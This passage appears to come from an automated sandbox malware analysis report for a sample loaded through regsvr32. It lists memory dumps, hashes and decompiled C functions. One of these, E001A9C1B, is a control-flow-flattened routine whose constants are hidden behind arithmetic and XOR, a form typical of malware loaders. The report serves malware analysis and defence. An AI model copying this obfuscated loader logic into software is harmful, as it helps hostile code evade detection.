                                                                                                                0x001b5ae9
                                                                                                                0x001b5af4
                                                                                                                0x001b5aff
                                                                                                                0x001b5b09
                                                                                                                0x001b5b14
                                                                                                                0x001b5b1f
                                                                                                                0x001b5b27
                                                                                                                0x001b5b32
                                                                                                                0x001b5b3d
                                                                                                                0x001b5b48
                                                                                                                0x001b5b53
                                                                                                                0x001b5b5e
                                                                                                                0x001b5b69
                                                                                                                0x001b5b74
                                                                                                                0x001b5b7f
                                                                                                                0x001b5b87
                                                                                                                0x001b5b95
                                                                                                                0x001b5b9c
                                                                                                                0x001b5baa
                                                                                                                0x001b5bae
                                                                                                                0x001b5bb3
                                                                                                                0x001b5bbb
                                                                                                                0x001b5bc3
                                                                                                                0x001b5bc8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $rb$$rb$Cjw$Cjw$[#$a?/$e_$rGD$w:j$R-$c
                                                                                                                • API String ID: 0-3456748807
                                                                                                                • Opcode ID: 7a8575c54c992434d482e6c42edfabb9d415e9f79e5526de883c4298cc6f12ec
                                                                                                                • Instruction ID: b0d775112aeff18803ccbba4e0c931267513af34149ed3f9674ff205e8f4fda3
                                                                                                                • Opcode Fuzzy Hash: 7a8575c54c992434d482e6c42edfabb9d415e9f79e5526de883c4298cc6f12ec
                                                                                                                • Instruction Fuzzy Hash: 077212715083809FD3B4CF65C58AB9BBBE2BBD4358F10891DE5DA86260DBB18949CF42
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 86%
                                                                                                                			E1003684C(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				signed int _v20;
                                                                                                                				struct tagPOINT _v28;
                                                                                                                				intOrPtr _v40;
                                                                                                                				signed int _v72;
                                                                                                                				char _v76;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t60;
                                                                                                                				signed int _t62;
                                                                                                                				signed int _t63;
                                                                                                                				signed int _t67;
                                                                                                                				signed int _t70;
                                                                                                                				intOrPtr _t72;
                                                                                                                				signed int _t79;
                                                                                                                				short _t80;
                                                                                                                				short _t87;
                                                                                                                				short _t92;
                                                                                                                				intOrPtr _t111;
                                                                                                                				intOrPtr _t115;
                                                                                                                				intOrPtr _t116;
                                                                                                                				intOrPtr* _t118;
                                                                                                                
                                                                                                                				_t115 = _a4;
                                                                                                                				_t118 = __ecx;
                                                                                                                				if(E10017E39(__ecx, __eflags, _t115) == 0) {
                                                                                                                					_t116 =  *((intOrPtr*)(_t115 + 4));
                                                                                                                					_push(__ebx);
                                                                                                                					_t100 = __ecx;
                                                                                                                					_t60 = E1001AD94(__ecx);
                                                                                                                					__eflags =  *(__ecx + 0x80) & 0x00000020;
                                                                                                                					_v20 = _t60;
                                                                                                                					if(( *(__ecx + 0x80) & 0x00000020) != 0) {
                                                                                                                						L5:
                                                                                                                						__eflags = _t116 - 0x200;
                                                                                                                						if(_t116 < 0x200) {
                                                                                                                							L7:
                                                                                                                							__eflags = _t116 - 0xa0 - 9;
                                                                                                                							if(__eflags > 0) {
                                                                                                                								L30:
                                                                                                                								_t62 = E1001A547(_t118);
                                                                                                                								__eflags = _t62;
                                                                                                                								if(_t62 == 0) {
                                                                                                                									L32:
                                                                                                                									__eflags = _v20;
                                                                                                                									if(_v20 == 0) {
                                                                                                                										L35:
                                                                                                                										_t63 = IsWindow( *(_t118 + 0x20));
                                                                                                                										__eflags = _t63;
                                                                                                                										if(_t63 == 0) {
                                                                                                                											L37:
                                                                                                                											__eflags = 0;
                                                                                                                											return 0;
                                                                                                                										}
                                                                                                                										return E1001839A(_a4);
                                                                                                                									} else {
                                                                                                                										goto L33;
                                                                                                                									}
                                                                                                                									while(1) {
                                                                                                                										L33:
                                                                                                                										_t117 = _v20;
                                                                                                                										_t67 =  *((intOrPtr*)( *_v20 + 0x100))(_a4);
                                                                                                                										__eflags = _t67;
                                                                                                                										if(_t67 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										_t70 = E1001A508(_t117);
                                                                                                                										__eflags = _t70;
                                                                                                                										_v20 = _t70;
                                                                                                                										if(_t70 != 0) {
                                                                                                                											continue;
                                                                                                                										}
                                                                                                                										goto L35;
                                                                                                                									}
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								__eflags =  *(_t62 + 0x68);
                                                                                                                								if( *(_t62 + 0x68) != 0) {
                                                                                                                									goto L37;
                                                                                                                								}
                                                                                                                								goto L32;
                                                                                                                							}
                                                                                                                							L8:
                                                                                                                							_v16 = E100231BA(0x201, _t100, _t116, _t118, __eflags);
                                                                                                                							_t72 = _a4;
                                                                                                                							_v28.y =  *((intOrPtr*)(_t72 + 0x18));
                                                                                                                							_v28.x =  *(_t72 + 0x14);
                                                                                                                							ScreenToClient( *(_t118 + 0x20),  &_v28);
                                                                                                                							E1003BB70(_t116,  &_v76, 0, 0x30);
                                                                                                                							_v76 = 0x28;
                                                                                                                							_t79 =  *((intOrPtr*)( *_t118 + 0x6c))(_v28.x, _v28.y,  &_v76);
                                                                                                                							__eflags = _v40 - 0xffffffff;
                                                                                                                							_v8 = _t79;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								_push(_v40);
                                                                                                                								E1003B59D(0x201, _t116, _t118, __eflags);
                                                                                                                							}
                                                                                                                							__eflags = _t116 - 0x201;
                                                                                                                							if(_t116 != 0x201) {
                                                                                                                								L13:
                                                                                                                								_v12 = _v12 & 0x00000000;
                                                                                                                								__eflags = _t116 - 0x201;
                                                                                                                								if(_t116 != 0x201) {
                                                                                                                									_t92 = GetKeyState(1);
                                                                                                                									__eflags = _t92;
                                                                                                                									if(_t92 < 0) {
                                                                                                                										_v8 =  *((intOrPtr*)(_v16 + 0x4c));
                                                                                                                									}
                                                                                                                								}
                                                                                                                								L16:
                                                                                                                								__eflags = _v8;
                                                                                                                								if(_v8 < 0) {
                                                                                                                									L26:
                                                                                                                									_t80 = GetKeyState(1);
                                                                                                                									__eflags = _t80;
                                                                                                                									if(_t80 >= 0) {
                                                                                                                										L28:
                                                                                                                										 *((intOrPtr*)( *_t118 + 0x164))(0xffffffff);
                                                                                                                										KillTimer( *(_t118 + 0x20), 0xe001);
                                                                                                                										L29:
                                                                                                                										 *((intOrPtr*)(_v16 + 0x4c)) = _v8;
                                                                                                                										goto L30;
                                                                                                                									}
                                                                                                                									__eflags = _v12;
                                                                                                                									if(_v12 == 0) {
                                                                                                                										goto L29;
                                                                                                                									}
                                                                                                                									goto L28;
                                                                                                                								}
                                                                                                                								__eflags = _v12;
                                                                                                                								if(_v12 != 0) {
                                                                                                                									goto L26;
                                                                                                                								}
                                                                                                                								__eflags = _t116 - 0x202;
                                                                                                                								if(_t116 != 0x202) {
                                                                                                                									__eflags =  *(_t118 + 0x7c) & 0x00000008;
                                                                                                                									if(( *(_t118 + 0x7c) & 0x00000008) != 0) {
                                                                                                                										L25:
                                                                                                                										 *((intOrPtr*)( *_t118 + 0x164))(_v8);
                                                                                                                										goto L29;
                                                                                                                									}
                                                                                                                									_t87 = GetKeyState(1);
                                                                                                                									__eflags = _t87;
                                                                                                                									if(_t87 < 0) {
                                                                                                                										goto L25;
                                                                                                                									}
                                                                                                                									_t111 = _v16;
                                                                                                                									__eflags = _v8 -  *((intOrPtr*)(_t111 + 0x4c));
                                                                                                                									if(_v8 ==  *((intOrPtr*)(_t111 + 0x4c))) {
                                                                                                                										goto L29;
                                                                                                                									}
                                                                                                                									_push(0x12c);
                                                                                                                									_push(0xe000);
                                                                                                                									L20:
                                                                                                                									E10035EEB(_t118);
                                                                                                                									goto L29;
                                                                                                                								}
                                                                                                                								 *((intOrPtr*)( *_t118 + 0x164))(0xffffffff);
                                                                                                                								_push(0xc8);
                                                                                                                								_push(0xe001);
                                                                                                                								goto L20;
                                                                                                                							}
                                                                                                                							__eflags = _v72 & 0x80000000;
                                                                                                                							if((_v72 & 0x80000000) == 0) {
                                                                                                                								goto L13;
                                                                                                                							}
                                                                                                                							_v12 = 1;
                                                                                                                							goto L16;
                                                                                                                						}
                                                                                                                						__eflags = _t116 - 0x209;
                                                                                                                						if(__eflags <= 0) {
                                                                                                                							goto L8;
                                                                                                                						}
                                                                                                                						goto L7;
                                                                                                                					}
                                                                                                                					__eflags = _t116 - 0x201;
                                                                                                                					if(_t116 == 0x201) {
                                                                                                                						goto L5;
                                                                                                                					}
                                                                                                                					__eflags = _t116 - 0x202;
                                                                                                                					if(_t116 != 0x202) {
                                                                                                                						goto L30;
                                                                                                                					}
                                                                                                                					goto L5;
                                                                                                                				}
                                                                                                                				L1:
                                                                                                                				return 1;
                                                                                                                			}





























                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientScreenWindow_memset
                                                                                                                • String ID: (
                                                                                                                • API String ID: 1268500159-3887548279
                                                                                                                • Opcode ID: fba6c1444f7bdc1507f2e291a75d7846eb6c16aaa07eba95ca6b0ba79e879cf4
                                                                                                                • Instruction ID: ae6d2f90c15a53321ff304e1902ce409ffcd63f462ce8200650d760429c34cbf
                                                                                                                • Opcode Fuzzy Hash: fba6c1444f7bdc1507f2e291a75d7846eb6c16aaa07eba95ca6b0ba79e879cf4
                                                                                                                • Instruction Fuzzy Hash: 6451BE34A00205DFDB12DF94CC89BADBBF9EF4C356F11815AE905AB292DB719E81CB41
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 98%
                                                                                                                			E001A9C1B() {
                                                                                                                				char _v520;
                                                                                                                				char _v1040;
                                                                                                                				signed int _v1044;
                                                                                                                				signed int _v1048;
                                                                                                                				signed int _v1052;
                                                                                                                				signed int _v1056;
                                                                                                                				signed int _v1060;
                                                                                                                				signed int _v1064;
                                                                                                                				signed int _v1068;
                                                                                                                				signed int _v1072;
                                                                                                                				signed int _v1076;
                                                                                                                				signed int _v1080;
                                                                                                                				signed int _v1084;
                                                                                                                				signed int _v1088;
                                                                                                                				signed int _v1092;
                                                                                                                				signed int _v1096;
                                                                                                                				signed int _v1100;
                                                                                                                				signed int _v1104;
                                                                                                                				signed int _v1108;
                                                                                                                				signed int _v1112;
                                                                                                                				signed int _v1116;
                                                                                                                				signed int _v1120;
                                                                                                                				signed int _v1124;
                                                                                                                				signed int _v1128;
                                                                                                                				signed int _v1132;
                                                                                                                				signed int _v1136;
                                                                                                                				signed int _v1140;
                                                                                                                				signed int _v1144;
                                                                                                                				signed int _v1148;
                                                                                                                				signed int _v1152;
                                                                                                                				signed int _v1156;
                                                                                                                				signed int _v1160;
                                                                                                                				signed int _v1164;
                                                                                                                				signed int _v1168;
                                                                                                                				signed int _v1172;
                                                                                                                				signed int _v1176;
                                                                                                                				signed int _v1180;
                                                                                                                				signed int _v1184;
                                                                                                                				signed int _v1188;
                                                                                                                				signed int _v1192;
                                                                                                                				signed int _v1196;
                                                                                                                				signed int _v1200;
                                                                                                                				signed int _v1204;
                                                                                                                				signed int _v1208;
                                                                                                                				signed int _v1212;
                                                                                                                				signed int _v1216;
                                                                                                                				signed int _v1220;
                                                                                                                				signed int _v1224;
                                                                                                                				void* _t426;
                                                                                                                				intOrPtr _t429;
                                                                                                                				intOrPtr _t431;
                                                                                                                				signed int _t444;
                                                                                                                				void* _t445;
                                                                                                                				void* _t479;
                                                                                                                				signed int _t489;
                                                                                                                				signed int _t490;
                                                                                                                				intOrPtr _t491;
                                                                                                                				intOrPtr* _t492;
                                                                                                                				signed int _t493;
                                                                                                                				signed int _t494;
                                                                                                                				signed int _t495;
                                                                                                                				signed int _t496;
                                                                                                                				signed int _t497;
                                                                                                                				signed int _t498;
                                                                                                                				signed int _t499;
                                                                                                                				signed int _t500;
                                                                                                                				void* _t501;
                                                                                                                				signed int _t503;
                                                                                                                				signed int* _t504;
                                                                                                                				void* _t507;
                                                                                                                
                                                                                                                				_t504 =  &_v1224;
                                                                                                                				_v1188 = 0x635e8c;
                                                                                                                				_t445 = 0x7417c3e;
                                                                                                                				_v1188 = _v1188 * 0x58;
                                                                                                                				_v1188 = _v1188 >> 3;
                                                                                                                				_v1188 = _v1188 << 9;
                                                                                                                				_v1188 = _v1188 ^ 0x8a200829;
                                                                                                                				_v1212 = 0xee437b;
                                                                                                                				_v1212 = _v1212 + 0xffff0885;
                                                                                                                				_v1212 = _v1212 + 0xc737;
                                                                                                                				_v1212 = _v1212 ^ 0x1155d7b9;
                                                                                                                				_v1212 = _v1212 ^ 0x11b4c4b1;
                                                                                                                				_v1132 = 0x60a0e3;
                                                                                                                				_t493 = 0x68;
                                                                                                                				_v1132 = _v1132 / _t493;
                                                                                                                				_t494 = 0x5e;
                                                                                                                				_v1052 = _v1052 & 0x00000000;
                                                                                                                				_v1132 = _v1132 * 0x37;
                                                                                                                				_v1132 = _v1132 ^ 0x003319d4;
                                                                                                                				_v1208 = 0xd527ba;
                                                                                                                				_v1208 = _v1208 >> 0x10;
                                                                                                                				_v1208 = _v1208 + 0xffff207f;
                                                                                                                				_v1208 = _v1208 / _t494;
                                                                                                                				_v1208 = _v1208 ^ 0x02b92ea5;
                                                                                                                				_v1164 = 0xbc5828;
                                                                                                                				_v1164 = _v1164 + 0xffff9734;
                                                                                                                				_v1164 = _v1164 + 0xffffbb4b;
                                                                                                                				_v1164 = _v1164 ^ 0x00bbaaa7;
                                                                                                                				_v1140 = 0x826326;
                                                                                                                				_v1140 = _v1140 | 0xb90d9d3f;
                                                                                                                				_t495 = 0x6d;
                                                                                                                				_v1140 = _v1140 / _t495;
                                                                                                                				_v1140 = _v1140 ^ 0x01b3d115;
                                                                                                                				_v1044 = 0x764452;
                                                                                                                				_v1044 = _v1044 >> 1;
                                                                                                                				_v1044 = _v1044 ^ 0x003b1bbf;
                                                                                                                				_v1116 = 0x9e9607;
                                                                                                                				_v1116 = _v1116 | 0xd4fb32ca;
                                                                                                                				_v1116 = _v1116 ^ 0xd4fc93bc;
                                                                                                                				_v1220 = 0x640107;
                                                                                                                				_v1220 = _v1220 ^ 0x369c3c4a;
                                                                                                                				_v1220 = _v1220 + 0xffffc06e;
                                                                                                                				_v1220 = _v1220 + 0xffffc2e6;
                                                                                                                				_v1220 = _v1220 ^ 0x36f71c54;
                                                                                                                				_v1072 = 0x8639c8;
                                                                                                                				_v1072 = _v1072 >> 8;
                                                                                                                				_v1072 = _v1072 ^ 0x000a15d3;
                                                                                                                				_v1104 = 0x7c2e44;
                                                                                                                				_v1104 = _v1104 | 0xffdbb7a1;
                                                                                                                				_v1104 = _v1104 ^ 0xffffc2ef;
                                                                                                                				_v1192 = 0xafb887;
                                                                                                                				_v1192 = _v1192 + 0x40e0;
                                                                                                                				_v1192 = _v1192 >> 7;
                                                                                                                				_v1192 = _v1192 + 0xdb01;
                                                                                                                				_v1192 = _v1192 ^ 0x0008e57b;
                                                                                                                				_v1108 = 0xc94cc7;
                                                                                                                				_v1108 = _v1108 + 0xb449;
                                                                                                                				_v1108 = _v1108 ^ 0x00cf6a1c;
                                                                                                                				_v1200 = 0x2709bd;
                                                                                                                				_v1200 = _v1200 >> 4;
                                                                                                                				_v1200 = _v1200 << 8;
                                                                                                                				_v1200 = _v1200 * 0x36;
                                                                                                                				_v1200 = _v1200 ^ 0x83cdb823;
                                                                                                                				_v1168 = 0x30c759;
                                                                                                                				_v1168 = _v1168 >> 2;
                                                                                                                				_t496 = 3;
                                                                                                                				_v1168 = _v1168 / _t496;
                                                                                                                				_v1168 = _v1168 ^ 0x000f074b;
                                                                                                                				_v1076 = 0xf7bffd;
                                                                                                                				_t497 = 0x79;
                                                                                                                				_v1076 = _v1076 / _t497;
                                                                                                                				_v1076 = _v1076 ^ 0x000cc935;
                                                                                                                				_v1084 = 0x509c01;
                                                                                                                				_v1084 = _v1084 ^ 0x44bd901b;
                                                                                                                				_v1084 = _v1084 ^ 0x44e5fe71;
                                                                                                                				_v1092 = 0xbb4fa2;
                                                                                                                				_v1092 = _v1092 + 0xffff6f51;
                                                                                                                				_v1092 = _v1092 ^ 0x00b7ce0b;
                                                                                                                				_v1100 = 0x8b948f;
                                                                                                                				_t498 = 0x3e;
                                                                                                                				_v1100 = _v1100 / _t498;
                                                                                                                				_v1100 = _v1100 ^ 0x000fac21;
                                                                                                                				_v1152 = 0x9a2681;
                                                                                                                				_v1152 = _v1152 * 0x30;
                                                                                                                				_v1152 = _v1152 + 0xffff8867;
                                                                                                                				_v1152 = _v1152 ^ 0x1ce08273;
                                                                                                                				_v1160 = 0xf8d484;
                                                                                                                				_v1160 = _v1160 << 4;
                                                                                                                				_v1160 = _v1160 >> 0xc;
                                                                                                                				_v1160 = _v1160 ^ 0x000e02db;
                                                                                                                				_v1068 = 0xa26624;
                                                                                                                				_v1068 = _v1068 << 7;
                                                                                                                				_v1068 = _v1068 ^ 0x513e3507;
                                                                                                                				_v1128 = 0xf40e59;
                                                                                                                				_v1128 = _v1128 >> 9;
                                                                                                                				_v1128 = _v1128 + 0xffff6005;
                                                                                                                				_v1128 = _v1128 ^ 0xfffef07e;
                                                                                                                				_v1136 = 0xb4d430;
                                                                                                                				_v1136 = _v1136 + 0xffff9497;
                                                                                                                				_v1136 = _v1136 >> 4;
                                                                                                                				_v1136 = _v1136 ^ 0x000c97ba;
                                                                                                                				_v1180 = 0xe33c24;
                                                                                                                				_v1180 = _v1180 + 0x3322;
                                                                                                                				_v1180 = _v1180 + 0xe925;
                                                                                                                				_v1180 = _v1180 ^ 0x00eb848e;
                                                                                                                				_v1144 = 0xd0b5de;
                                                                                                                				_v1144 = _v1144 + 0xc7d1;
                                                                                                                				_v1144 = _v1144 >> 0xb;
                                                                                                                				_v1144 = _v1144 ^ 0x00047407;
                                                                                                                				_v1196 = 0x500694;
                                                                                                                				_v1196 = _v1196 + 0xffffa4ae;
                                                                                                                				_v1196 = _v1196 + 0xffffb3a9;
                                                                                                                				_v1196 = _v1196 << 2;
                                                                                                                				_v1196 = _v1196 ^ 0x013957d3;
                                                                                                                				_v1096 = 0x6c809e;
                                                                                                                				_v1096 = _v1096 | 0xabf58474;
                                                                                                                				_v1096 = _v1096 ^ 0xabf462f4;
                                                                                                                				_v1056 = 0xef762f;
                                                                                                                				_v1056 = _v1056 << 7;
                                                                                                                				_v1056 = _v1056 ^ 0x77b72062;
                                                                                                                				_v1124 = 0xaf7fe0;
                                                                                                                				_v1124 = _v1124 | 0xe0ec28e2;
                                                                                                                				_v1124 = _v1124 >> 8;
                                                                                                                				_v1124 = _v1124 ^ 0x00e7ca48;
                                                                                                                				_v1156 = 0x7a9cac;
                                                                                                                				_v1156 = _v1156 << 5;
                                                                                                                				_v1156 = _v1156 ^ 0x97ddcbc4;
                                                                                                                				_v1156 = _v1156 ^ 0x98839c30;
                                                                                                                				_v1080 = 0x3cd97f;
                                                                                                                				_v1080 = _v1080 << 9;
                                                                                                                				_v1080 = _v1080 ^ 0x79b013b8;
                                                                                                                				_v1216 = 0x22953e;
                                                                                                                				_t499 = 0x5a;
                                                                                                                				_t444 = _v1052;
                                                                                                                				_v1216 = _v1216 / _t499;
                                                                                                                				_t489 = 0x36;
                                                                                                                				_t503 = _v1052;
                                                                                                                				_v1216 = _v1216 / _t489;
                                                                                                                				_v1216 = _v1216 ^ 0x722a41cb;
                                                                                                                				_v1216 = _v1216 ^ 0x72272010;
                                                                                                                				_v1048 = 0x950feb;
                                                                                                                				_v1048 = _v1048 ^ 0x25b50b8a;
                                                                                                                				_v1048 = _v1048 ^ 0x25247296;
                                                                                                                				_v1172 = 0xfc1e60;
                                                                                                                				_v1172 = _v1172 >> 3;
                                                                                                                				_v1172 = _v1172 + 0xaa76;
                                                                                                                				_v1172 = _v1172 ^ 0x00297d33;
                                                                                                                				_v1224 = 0x400f66;
                                                                                                                				_v1224 = _v1224 | 0x109f1cd3;
                                                                                                                				_v1224 = _v1224 ^ 0x1e1dc7cb;
                                                                                                                				_v1224 = _v1224 | 0xc0536b48;
                                                                                                                				_v1224 = _v1224 ^ 0xcede1365;
                                                                                                                				_v1112 = 0x86225c;
                                                                                                                				_v1112 = _v1112 | 0x8fbaf335;
                                                                                                                				_v1112 = _v1112 ^ 0x8fb6cec0;
                                                                                                                				_v1176 = 0x194dbd;
                                                                                                                				_t500 = 0x2e;
                                                                                                                				_v1176 = _v1176 * 0x66;
                                                                                                                				_v1176 = _v1176 + 0xffff942d;
                                                                                                                				_v1176 = _v1176 ^ 0x0a146cac;
                                                                                                                				_v1148 = 0x617020;
                                                                                                                				_v1148 = _v1148 * 0x7a;
                                                                                                                				_v1148 = _v1148 * 0x78;
                                                                                                                				_v1148 = _v1148 ^ 0xc43877e8;
                                                                                                                				_v1088 = 0x442f60;
                                                                                                                				_v1088 = _v1088 ^ 0xd23e9e94;
                                                                                                                				_v1088 = _v1088 ^ 0xd27ebae0;
                                                                                                                				_v1204 = 0x3baa1b;
                                                                                                                				_t501 = 0x75be780;
                                                                                                                				_v1204 = _v1204 / _t500;
                                                                                                                				_v1204 = _v1204 >> 0xd;
                                                                                                                				_t490 = _v1052;
                                                                                                                				_v1204 = _v1204 / _t489;
                                                                                                                				_v1204 = _v1204 ^ 0x000c972d;
                                                                                                                				_v1064 = 0xa0e5a;
                                                                                                                				_v1064 = _v1064 >> 0xa;
                                                                                                                				_v1064 = _v1064 ^ 0x000a930b;
                                                                                                                				_v1060 = 0x5fdf65;
                                                                                                                				_v1060 = _v1060 >> 1;
                                                                                                                				_v1060 = _v1060 ^ 0x002a8ac0;
                                                                                                                				_v1120 = 0x30d4d5;
                                                                                                                				_v1120 = _v1120 * 0x5d;
                                                                                                                				_v1120 = _v1120 + 0xffffbb5a;
                                                                                                                				_v1120 = _v1120 ^ 0x11b9a9c0;
                                                                                                                				_v1184 = 0x3ec506;
                                                                                                                				_v1184 = _v1184 + 0xffff16f3;
                                                                                                                				_v1184 = _v1184 ^ 0x479a7891;
                                                                                                                				_v1184 = _v1184 >> 1;
                                                                                                                				_v1184 = _v1184 ^ 0x23dc1c5d;
                                                                                                                				while(1) {
                                                                                                                					L1:
                                                                                                                					_t479 = 0x5c;
                                                                                                                					do {
                                                                                                                						while(1) {
                                                                                                                							L2:
                                                                                                                							_t507 = _t445 - _t501;
                                                                                                                							if(_t507 > 0) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							if(_t507 == 0) {
                                                                                                                								E001BED7B(_t503, _v1088, _v1204, _v1064);
                                                                                                                								L16:
                                                                                                                								_t445 = 0x6d2f3f8;
                                                                                                                								while(1) {
                                                                                                                									L1:
                                                                                                                									_t479 = 0x5c;
                                                                                                                									goto L2;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								if(_t445 == 0x56556b4) {
                                                                                                                									_push(_t445);
                                                                                                                									_t444 = E001A6E01(_v1144, _v1196, _t445, _v1096, _v1212);
                                                                                                                									_t504 =  &(_t504[4]);
                                                                                                                									__eflags = _t444;
                                                                                                                									if(_t444 != 0) {
                                                                                                                										_t445 = 0xfe12626;
                                                                                                                										while(1) {
                                                                                                                											L1:
                                                                                                                											_t479 = 0x5c;
                                                                                                                											goto L2;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									if(_t445 == 0x56be5f4) {
                                                                                                                										_t491 =  *0x1c4c10; // 0x67d820
                                                                                                                										_t492 = _t491 + 0x20c;
                                                                                                                										while(1) {
                                                                                                                											__eflags =  *_t492 - _t479;
                                                                                                                											if( *_t492 == _t479) {
                                                                                                                												break;
                                                                                                                											}
                                                                                                                											_t492 = _t492 + 2;
                                                                                                                											__eflags = _t492;
                                                                                                                										}
                                                                                                                										_t490 = _t492 + 2;
                                                                                                                										_t445 = 0x56556b4;
                                                                                                                										continue;
                                                                                                                									} else {
                                                                                                                										if(_t445 == 0x6d2f3f8) {
                                                                                                                											E001BED7B(_t444, _v1060, _v1120, _v1184);
                                                                                                                										} else {
                                                                                                                											if(_t445 != 0x7417c3e) {
                                                                                                                												goto L24;
                                                                                                                											} else {
                                                                                                                												E001A3466(_v1188, _v1044, _t445, _t445,  &_v1040, _v1116, _t445, _v1220, _v1072, _v1104);
                                                                                                                												_t504 =  &(_t504[8]);
                                                                                                                												_t445 = 0xb3d6292;
                                                                                                                												while(1) {
                                                                                                                													L1:
                                                                                                                													_t479 = 0x5c;
                                                                                                                													goto L2;
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                							L27:
                                                                                                                							return _v1052;
                                                                                                                						}
                                                                                                                						__eflags = _t445 - 0xb3d6292;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_push(_v1168);
                                                                                                                							_push(0x1a10bc);
                                                                                                                							_push(_v1200);
                                                                                                                							_t426 = E001BF5D9(_v1192, _v1108, __eflags);
                                                                                                                							_t429 =  *0x1c4c10; // 0x67d820
                                                                                                                							_t431 =  *0x1c4c10; // 0x67d820
                                                                                                                							__eflags = _t431 + 4;
                                                                                                                							E001AD467(_v1084, _t431 + 4, _v1092, _t431 + 4, _v1192, _v1100, _t429 + 0x20c, _v1152, _t426,  &_v520,  &_v1040, _v1160);
                                                                                                                							E001BF94B(_t426, _v1068, _v1128, _v1136, _v1180);
                                                                                                                							_t504 =  &(_t504[0x10]);
                                                                                                                							_t445 = 0x56be5f4;
                                                                                                                							_t501 = 0x75be780;
                                                                                                                							_t479 = 0x5c;
                                                                                                                							goto L24;
                                                                                                                						} else {
                                                                                                                							__eflags = _t445 - 0xf5091cf;
                                                                                                                							if(_t445 == 0xf5091cf) {
                                                                                                                								E001A364E(_t444, _v1112, _t503, _v1176, _v1148);
                                                                                                                								_t504 =  &(_t504[3]);
                                                                                                                								_t445 = _t501;
                                                                                                                								goto L1;
                                                                                                                							} else {
                                                                                                                								__eflags = _t445 - 0xfe12626;
                                                                                                                								if(_t445 != 0xfe12626) {
                                                                                                                									goto L24;
                                                                                                                								} else {
                                                                                                                									_t503 = E001B9862(_v1208, _v1056, _t490,  &_v520, _v1124, _v1156, _v1080, _v1140, _t490, _v1164, _t445, _v1132, _v1216, _t445, _t445, _v1048, _t444, _t445, _v1172, _t445, _v1224);
                                                                                                                									_t504 =  &(_t504[0x13]);
                                                                                                                									__eflags = _t503;
                                                                                                                									if(_t503 == 0) {
                                                                                                                										goto L16;
                                                                                                                									} else {
                                                                                                                										_t445 = 0xf5091cf;
                                                                                                                										_v1052 = 1;
                                                                                                                										while(1) {
                                                                                                                											L1:
                                                                                                                											_t479 = 0x5c;
                                                                                                                											goto L2;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L27;
                                                                                                                						L24:
                                                                                                                						__eflags = _t445 - 0xf3cba29;
                                                                                                                					} while (_t445 != 0xf3cba29);
                                                                                                                					goto L27;
                                                                                                                				}
                                                                                                                			}









































































                                                                                                                0x001a9e07
                                                                                                                0x001a9e11
                                                                                                                0x001a9e15
                                                                                                                0x001a9e1d
                                                                                                                0x001a9e27
                                                                                                                0x001a9e32
                                                                                                                0x001a9e37
                                                                                                                0x001a9e3d
                                                                                                                0x001a9e45
                                                                                                                0x001a9e57
                                                                                                                0x001a9e5c
                                                                                                                0x001a9e65
                                                                                                                0x001a9e70
                                                                                                                0x001a9e7b
                                                                                                                0x001a9e86
                                                                                                                0x001a9e91
                                                                                                                0x001a9e9c
                                                                                                                0x001a9ea7
                                                                                                                0x001a9eb2
                                                                                                                0x001a9ec4
                                                                                                                0x001a9ec7
                                                                                                                0x001a9ece
                                                                                                                0x001a9ed9
                                                                                                                0x001a9ee6
                                                                                                                0x001a9eea
                                                                                                                0x001a9ef2
                                                                                                                0x001a9efa
                                                                                                                0x001a9f02
                                                                                                                0x001a9f07
                                                                                                                0x001a9f0c
                                                                                                                0x001a9f14
                                                                                                                0x001a9f1f
                                                                                                                0x001a9f27
                                                                                                                0x001a9f32
                                                                                                                0x001a9f3a
                                                                                                                0x001a9f3f
                                                                                                                0x001a9f47
                                                                                                                0x001a9f4f
                                                                                                                0x001a9f57
                                                                                                                0x001a9f5f
                                                                                                                0x001a9f64
                                                                                                                0x001a9f6c
                                                                                                                0x001a9f74
                                                                                                                0x001a9f7c
                                                                                                                0x001a9f84
                                                                                                                0x001a9f8c
                                                                                                                0x001a9f94
                                                                                                                0x001a9f9c
                                                                                                                0x001a9fa1
                                                                                                                0x001a9fa9
                                                                                                                0x001a9fb1
